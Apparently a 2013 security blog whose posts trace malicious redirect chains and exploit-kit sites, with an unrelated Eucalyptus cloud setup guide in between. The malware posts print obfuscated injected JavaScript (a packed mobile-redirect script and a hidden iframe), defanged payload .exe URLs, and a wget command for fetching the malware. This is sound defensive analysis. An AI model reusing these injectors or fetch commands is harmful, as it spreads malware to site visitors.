How to handle the redirection from malicious websites..!!

1 Comment

The journey starts with a link of urlquery.com website.

http://urlquery.net/report.php?id=2495895

Where this link tell us about a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL is normal one if you ignore the .ru thing 🙂

When I tried to execute this one over my Browser they redirected me to

https://www.google.com/search?q=wallmart

Then I have to use wget to get the download this file.

After downloading this file I tried to open this in Browser and again the same redirection. Grrr..

Let’s see the reply header

HTTP/1.1 200 OK
 Server: nginx/0.8.54
 Date: Thu, 16 May 2013 14:26:15 GMT
 Content-Type: text/html
 Connection: keep-alive
 Last-Modified: Thu, 16 May 2013 14:03:59 GMT
 ETag: "6bc8011-2e9-4dcd6567d31c0"
 Accept-Ranges: bytes
 Content-Length: 745

Ok so we all know the website is not down and it’s redirecting, as we have the code so let’s take look over the code which is redirecting us.

<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
location.replace("h00p://virgin-altantic[dot]net/news/ask-index.php");//--></script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>

Suspicious ok let’s see what virustotal say about this this website.

https://www.virustotal.com/en/url/b9ae75bcf2d8bc16b2f14b1ca12eafb755ff6d18fb9beb4b3a9f877c8a4b177a/analysis/1368878313/

and

https://www.virustotal.com/en/url/3077275f26bf120619a28734abebf7d321efa8be0c43b6bb0954d5092337a873/analysis/1368878322/

The above 2 are the URL with which I started with and another one is of

h00p://polycontract[dot]ru

So, they got redirection over every webpage so I have to download every thing using wget and then to analyze it, no GUI only code 😦

2 different analysis anyways good thing is it’s still showing us that it is malicious 🙂

After downloading the 2nd file I analysed it and find out there are 2 java scripts in that one.

So, I downloaded those 2 files respectively and the link were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>

Time to analyze these 2 files. The virus total reports are

For core.js

https://www.virustotal.com/en/file/6f9229b2551587de22aa693b5da6e5ff350d521825b675a3549d0e09cccd67a1/analysis/1368878881/

For caption.js

https://www.virustotal.com/en/file/66b9077dc4b1c53d1d4bb7e9d3e333a5a3a3aae4b9d01f96b5c8d5c722208e94/analysis/1368878892/

Indeed they are malicious.

Time to take a look inside these 2

document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%53%74%72%69%6E%67%28%33%36%29%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%37%20%31%3D%38%2E%39%2E%61%28%2F%28%62%29%7C%28%65%29%7C%28%66%29%7C%28%68%29%7C%28%6A%29%7C%28%6B%29%7C%28%6C%29%7C%28%6D%29%7C%28%6E%29%7C%28%6F%29%7C%28%70%29%7C%28%71%29%7C%28%72%29%7C%28%73%29%7C%28%75%2D%29%7C%28%77%29%7C%28%78%29%7C%28%79%29%7C%28%7A%29%7C%28%41%29%7C%28%42%29%7C%28%43%29%7C%28%44%29%7C%28%45%29%7C%28%46%29%7C%28%47%29%7C%28%30%2D%63%29%7C%28%30%2D%64%29%7C%28%30%2D%67%29%7C%28%48%2D%29%7C%28%49%29%7C%28%4A%29%7C%28%32%29%7C%28%4B%29%7C%28%4C%29%7C%28%4D%29%7C%28%4E%2D%29%7C%28%4F%29%7C%28%50%29%7C%28%51%2D%29%7C%28%52%29%7C%28%53%29%7C%28%54%29%7C%28%55%29%7C%28%56%29%7C%28%57%29%7C%28%58%29%7C%28%59%29%7C%28%5A%29%7C%28%31%30%29%7C%28%31%31%29%7C%28%31%32%29%7C%28%31%33%29%7C%28%31%34%29%7C%28%31%35%29%7C%28%31%36%29%7C%28%31%37%29%7C%28%31%38%2D%29%7C%28%31%39%2D%29%7C%28%31%61%29%7C%28%31%62%29%7C%28%31%63%2D%29%7C%28%31%64%29%7C%28%31%65%2D%29%7C%28%31%66%29%7C%28%31%67%29%7C%28%31%68%29%7C%28%31%69%29%7C%28%31%6A%2D%29%7C%28%31%6B%29%7C%28%74%2D%31%6C%29%7C%28%31%6D%29%7C%28%31%6E%2D%29%7C%28%31%6F%29%7C%28%31%70%2D%29%7C%28%31%71%29%7C%28%31%72%29%7C%28%31%73%2D%76%29%7C%28%31%74%29%7C%28%31%75%29%7C%28%33%2D%29%7C%28%31%76%29%7C%28%31%77%29%7C%28%31%78%29%7C%28%31%79%29%7C%28%31%7A%29%7C%28%34%29%7C%28%34%29%7C%28%35%29%7C%28%35%2D%29%7C%28%36%2E%31%41%29%7C%28%36%2E%31%42%29%7C%28%31%43%2E%31%44%29%7C%28%31%45%29%7C%28%31%46%29%7C%28%31%47%29%7C%28%31%48%29%7C%28%32%29%7C%28%33%29%7C%28%31%49%29%7C%28%31%4A%29%7C%28%31%4B%29%7C%28%31%4C%29%7C%28%31%4D%29%7C%28%31%4E%29%7C%28%31%4F%29%7C%28%31%50%2E%31%51%29%7C%28%31%52%29%7C%28%31%53%29%2F%69%29%3B%31%54%28%31%29%7B%31%55%2E%31%56%2E%31%57%3D%22%31%58%22%7D%27%2C%36%32%2C%31%32%32%2C%27%6C%67%7C%69%73%6D%6F%62%69%6C%65%7C%6D%69%64%70%7C%77%61%70%7C%77%69%6E%77%7C%78%64%61%7C%75%70%7C%76%61%72%7C%6E%61%76%69%67%61%74%6F%72%7C%75%73%65%72%41%67%65%6E%74%7C%6D%61%74%63%68%7C%61%63%73%7C%7C%7C%61%6C%61%76%7C%61%6C%63%61%7C%7C%61%6D%6F%69%7C%7C%61%75%64%69%7C%61%73%74%65%7C%61%76%61%6E%7C%62%65%6E%71%7C%62%69%72%64%7C%62%6C%61%63%7C%62%6C%61%7A%7C%62%72%65%77%7C%63%65%6C%6C%7C%63%6C%64%63%7C%7C%63%6D%64%7C%7C%64%61%6E%67%7C%64%6F%63%6F%7C%65%72%69%63%7C%68%69%70%74%7C%69%6E%6E%6F%7C%69%70%61%71%7C%6A%61%76%61%7C%6A%69%67%73%7C%6B%64%64%69%7C%6B%65%6A%69%7C%6C%65%6E%6F%7C%6C%67%65%7C%6D%61%75%69%7C%6D%61%78%6F%7C%6D%69%74%73%7C%6D%6D%65%66%7C%6D%6F%62%69%7C%6D%6F%74%7C%6D%6F%74%6F%7C%6D%77%62%70%7C%6E%65%63%7C%6E%65%77%74%7C%6E%6F%6B%69%7C%6F%70%77%76%7C%70%61%6C%6D%7C%70%61%6E%61%7C%70%61%6E%74%7C%70%64%78%67%7C%70%68%69%6C%7C%70%6C%61%79%7C%70%6C%75%63%7C%70%6F%72%74%7C%70%72%6F%78%7C%71%74%65%6B%7C%71%77%61%70%7C%73%61%67%65%7C%73%61%6D%73%7C%73%61%6E%79%7C%73%63%68%7C%73%65%63%7C%73%65%6E%64%7C%73%65%72%69%7C%73%67%68%7C%73%68%61%72%7C%73%69%65%7C%73%69%65%6D%7C%73%6D%61%6C%7C%73%6D%61%72%7C%73%6F%6E%79%7C%73%70%68%7C%73%79%6D%62%7C%6D%6F%7C%74%65%6C%69%7C%74%69%6D%7C%74%6F%73%68%7C%74%73%6D%7C%75%70%67%31%7C%75%70%73%69%7C%76%6B%7C%76%6F%64%61%7C%77%33%63%73%7C%77%61%70%61%7C%77%61%70%69%7C%77%61%70%70%7C%77%61%70%72%7C%77%65%62%63%7C%62%72%6F%77%73%65%72%7C%6C%69%6E%6B%7C%77%69%6E%64%6F%77%73%7C%63%65%7C%69%65%6D%6F%62%69%6C%65%7C%6D%69%6E%69%7C%6D%6D%70%7C%73%79%6D%62%69%61%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

The malicious code is common for both of the files.

After decrypting it what I got is

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

Which is finally redirecting you to

h00p://online2you[dot]org/search.php?sid=1

Next task was to get the payload as most probably this was the site where they have hidden the treasure.

But unfortunately this was down error 404

h00p://online2you[dot]org/search.php?sid=1
Resolving online2you.org... 67.215.66.132
 Connecting to online2you.org|67.215.66.132|:80... connected.
 HTTP request sent, awaiting response... 404 Not Found
 2013-05-18 17:44:43 ERROR 404: Not Found.

I thought as there is redirection everywhere then this might be because of different location, So I tried it with proxy os US,Russia and some 3-4 more sut same result for every thing.

is it me or everyone else is unable to download the contents from this site?

ok let’s see the who is for the website

whois for  h00p://polycontract[dot]ru/

domain:        POLYCONTRACT.RU
nserver:       ns1.hosting.reg.ru.
nserver:       ns2.hosting.reg.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you: http://urlquery.net/report.php?id=1747064

whois for h00p://online2you[dot]org/

Domain ID:D168159997-LROR
Domain Name:ONLINE2YOU.ORG
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring Registrar:Bizcn.com, Inc. (R1248-LROR)
Status:OK Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
 remarks: Registration information: http://www.pir.org

And in last snap shot of all the the files which I have gathered

Screen Shot 2013-05-18 at 5.55.55 PM

This was my Journey and this was the end.

Your Inputs / Criticism are required

#MalwareMustDie

Advertisements

Eucalyptus Deployment

Leave a comment

 

Most Important thing Activate the Virtualization from the Bios else nothing going to work (This is what I forgot to do)

The The version of Eucalyptus which I got is 3.2 and you can download it from

http://www.eucalyptus.com/download/faststart

This got Eucalyptus over CentOS which we may install for 1 node or multiple node.

For installation over 1 node it’s comparatively easy and fast, So I am just discussing Installation over 2 node .

 

Hardware I got:

 

2 server both identical

quard core intel xeon processor

4GB ram

1TB hardisk

2 Networking Cards

 

1st machine specification

Name of node: MyCloudPortalNode

IP: eth0: 10.20.0.51 (This is for public use)

eth1:10.0.0.1 (This is for private use)

1)Start the System and press F2 key and get into bios.

2)In advance menu “Enable” virualization which was previously disabled. Press F10 to save

3)Press F6 on restart and choose the boot form CD option

4)Insert the Eucalyptus DVD and when it prompts for the options choose for installation of node server

5) when it prompts for the networking IP insert the values which already have provided on the top.

6)It’s going ot create the br0 (Bridge) by itself.

7) Set the ntp server

Yum install ntp

chkconfig ntpd ok

service ntpd start

then check the date by

date

 

Leave this machine just like then and then go for the installation of front controller

 

2nd machine

Name of Node: MyCloudPortalFront

IP: Eth0: 10.2.0.52

Etho1: 10.0.0.2

 

1)Start the System and press F2 key and get into bios.

2)In advance menu “Enable” virtualization which was previously disabled. Press F10 to save

3)Press F6 on restart and choose the boot from CD option

4)Insert the Eucalyptus DVD and when it prompts for the options choose for installation choose install front end.

5) Choose the IP which I have already be defined and then start it

6) when it got start it would ask about the public and private IP

 

don’t change private IP and in public IP provide the IP range which you want to be selected by the VM when this would get ocneected.

7)make all this accordingly and then start the machine.

This would ask about the IP of node on restarting the system after installation being done, enter the IP of nodes then this would prompt for SU password enter it and it is registered 🙂

8)Set the ntp server

Yum install ntp

chkconfig ntpd ok

service ntpd start

 

then check the date

Now both machine common.

Power off all the eucalyptus services

Over Front end

Service eucalyptus-cloud stop

service eucalyptus-cc stop

Over NC

service eucalyptus-nc stop

 

Test euca-describe-availability-zones verbose

 

Output should be like this, I already got 2 Small VM so it’s saying that free is 2/4

euca-describe-availability-zones verbose

AVAILABILITYZONE CLUSTER01 10.0.0.2 arn:euca:eucalyptus:CLUSTER01:cluster:cc_01/

AVAILABILITYZONE |- vm types free / max   cpu   ram  disk

AVAILABILITYZONE |- m1.small 0002 / 0004   1 512 5

AVAILABILITYZONE |- c1.medium 0001 / 0002   2 512 10

AVAILABILITYZONE |- m1.large 0001 / 0002   2   1024 15

AVAILABILITYZONE |- m1.xlarge 0001 / 0002   2   2048 20

AVAILABILITYZONE |- c1.xlarge 0000 / 0001   4   4096 20

For checking the number of VM you may create and other available resources.

 

Now start all three services and navigate your browser to

 

https://<frontendip>:8888 : For creation of VM

Dashboard

https://<frontendip>:8443  : For profile editing


8443

Now go and play with VM 🙂

After creation of VM this is how this will look like when a VM is created and running.

The green tick mark will be different for different kind of things.

Vm_Created

Do comment about your views any error or some questions.

I love Comments 😉

Handling error 402: Payment Required with malicious domain #MMD

4 Comments

Link from where I started:

http://urlquery.net/report.php?id=1858750

And this link directed me to here:

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar

Error 402 and payment Required .

Request URL:h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar
Request Method:GET
Status Code:402 Payment Required
Response Header
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

Suspicious isn’t it..

So I proceeded by getting in the sub directories of the server and it resulted in the link

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL

Which automatically lead to a blank webpage.

Response for h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/pdfx.html

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:817
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:50 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Response for “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/zmiohek.html”

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1676
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:51 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

When I tried to analysed its source then find out a variable storing the web address.

<script>
var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";
</script>

now use

wget –save-headers -d h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32

-d for debugging and –save-headers for saving the headers.

Or

Simply paste this in your browser to download the exe 😉

Now this is the Analysis Report of this file using Virus total and it says 8/45

https://www.virustotal.com/en/file/cb92c51ba26391eae67d85b968b61a71e33cea4a82894f10fa6777ae9938e7e8/analysis/

Anubis Report for this exe

http://anubis.iseclab.org/?action=result&task_id=1956ca7159064b544fd05dd3c6c72cd5e&format=pdf

Dig Report

dig XFECAJSMIPICHBEX.IN ANY
; <<>> DiG 9.8.3-P1 <<>> XFECAJSMIPICHBEX.IN ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5853
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;XFECAJSMIPICHBEX.IN. IN ANY
;; ANSWER SECTION:
XFECAJSMIPICHBEX.IN. 28800 IN A 192.210.150.43
XFECAJSMIPICHBEX.IN. 7200 IN SOA erdomain.mercury.orderbox-dns.com. founderapi.email.com. 2013040403 7200 7200 172800 38400
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mars.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.venus.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mercury.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.earth.orderbox-dns.com.
;; Query time: 401 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Tue Apr 9 11:42:38 2013
;; MSG SIZE rcvd: 239

 

whois xfecajsmipichbex.in
Domain ID:D7196301-AFIN
Domain Name:XFECAJSMIPICHBEX.IN
Created On:04-Apr-2013 21:46:01 UTC
Last Updated On:04-Apr-2013 21:46:03 UTC
Expiration Date:04-Apr-2014 21:46:01 UTC
Sponsoring Registrar:Webiq Domains Solutions Pvt. Ltd. (R131-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:WIQ_27213783
Registrant Name:founder api
Registrant Organization:N/A
Registrant Street1:foundap 4
Registrant City:new york
Registrant State/Province:New York
Registrant Postal Code:10006
Registrant Country:US
Registrant Phone:+1.5274563219
Registrant Email:founderapi@email.com

Domains hosted over Same IP Virus total report:
https://www.virustotal.com/en/ip-address/192.210.150.43/information/

 

If you check the WhoIs for every domain you will find the same credentials like phone number,

 

Screen shot for h00p://192.210.150.43/

                            

Screen shot for Geographical address locator.

According to the  http://wepawet.iseclab.org/view.php?hash=453609c244e3925ce0fe662a71eba0a8&t=1365501256&type=js

Code there are 2 PDF but able to download just 1 of those 2.

 

Pdf downloaded

TLfeaOwS.pdf

Header for page “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/TLfeaOwS.pdf”

 

PDF Data over browser:

 

%PDF-1.6 %�•� 18 0 obj <> endobj 6 0 obj <> endobj 22 0 obj <> endobj 8 0 obj <> stream 1.6511*pdf Piexnlaypa

endstream endobj 20 0 obj <> endobj 23 0 obj <> endobj 5 0 obj <> endobj 1 0 obj <> endobj 21 0 obj <> endobj 7 0 obj <> /XObject <<>>>> endobj 19 0 obj <> endobj xref 0 24 trailer <> startxref 802 %%EOF
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0</pre>
Content-Encoding:gzip
Content-Length:5531
Content-Type:text/html;charset=utf-8
Date:Tue, 09 Apr 2013 13:17:17 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Virus total report for the pdf file

https://www.virustotal.com/en/file/e0be674422a6579361b0724da99eee4c9b33e137239a7268c530f1afea0c1b3d/analysis/1366874391/

Which confirm this as malicious.

Screen Shot 2013-04-25 at 4.47.15 PM

Snap Shot of all the files.

Every time you download the file it’s goign to give some random name to it.

 

#MalwareMustDie

Malicious robaina91.com analysis #MMD

2 Comments

we got the information of Bad guy from this link (http://urlquery.net/report.php?id=1906732)

Which FInally leads us to this (h00p://www.robaina91[dot]com/es/robaina-album.html) website.

This looks like some normal one but it is not (Though google Crome already told me about the site is malecious).

Let’s try to see the reply header

 

Accept-Ranges:bytes

Connection:close

Content-Length:30270

Content-Type:text/html

Date:Wed, 10 Apr 2013 10:45:33 GMT

ETag:”5e18278-763e-51f1a980″

Last-Modified:Fri, 01 Feb 2013 20:09:26 GMT

Server:Apache/2.2.3 (CentOS)

 

Looks like normal one indeed it is lets dig a little more 🙂

 

On little analysis of this code I find out

<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;">

 

ok, Lets analyse this link  h00p://allbestauto042[dot]ru/in.cgi?ftp

The Header says

Request URL:h00p://allbestauto042[dot]ru/in.cgi?ftp

Request Method:GET

Status Code:302 Found

 

Query String Parametersview sourceview URL encoded

  1. ftp:

Response Headersview source

Connection:close

Content-Type:text/html; charset=UTF-8

Date:Thu, 11 Apr 2013 06:08:31 GMT

Location:http://google.com

Server:Apache/2.2.15 (CentOS)

Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;domain=allbestauto042.ru

Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;domain=allbestauto042.ru

Transfer-Encoding:chunked

 

Why 302 and why is is redirecting and why not showing google IDK Please do tell me as I have no idea but this look suspecious.

After this it is loading 10 php file

h00p://newssearch006[dot]ru/flow01.php

 

Range from flow01-10

 

Lets dig a little more.

Request URL:h00p://promoution115[dot]ru/tds/in.cgi?default

Request Method:GET

Status Code:302 Found

 

Response header

Connection:close

Content-Type:text/html; charset=UTF-8

Date:Thu, 11 Apr 2013 06:14:46 GMT

Location:http://www.google.com

Server:Apache/2.2.15 (CentOS)

Set-Cookie:vbpnxdefault=_10_0_20_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru

Set-Cookie:vbpnx2=_0_98_102_48_35_58_88_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru

Transfer-Encoding:chunked

 

Again redirecting.

 

After digging a little more I came across

 

“h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/pdfx.html”

and

“h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html”

 

This ask me to use JAVA as I don’t know the website so I never give permission but this means I am on track and close to my target.

So let’s dig a little more.

 

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Content-Encoding:gzip

Content-Length:735

Content-Type:text/html;charset=utf-8

Date:Thu, 11 Apr 2013 04:17:33 GMT

Expires:Thu, 19 Nov 1981 08:52:00 GMT

Pragma:no-cache

Server:nginx/0.7.64

X-Mode:HTML

X-Powered-By:ASP.NET version 4

X-Powered-By:HPHP

 

Let’s take a look in it’s code

 

<script></p>
<p dir="ltr">ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';</p>
<p dir="ltr">var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';</p>
<p dir="ltr">var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";</p>
<p dir="ltr"></script>

 

Isn’t this suspecious..??

 

h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

Let’s see another file now and this end up with

 

RequestURL:h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html

Request Method:GET

Status Code:200 OK

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Content-Encoding:gzip

Content-Length:1701

Content-Type:text/html;charset=utf-8

Date:Thu, 11 Apr 2013 12:04:24 GMT

Expires:Thu, 19 Nov 1981 08:52:00 GMT

Pragma:no-cache

Server:nginx/0.7.64

X-Mode:HTML

X-Powered-By:ASP.NET version 4

X-Powered-By:HPHP

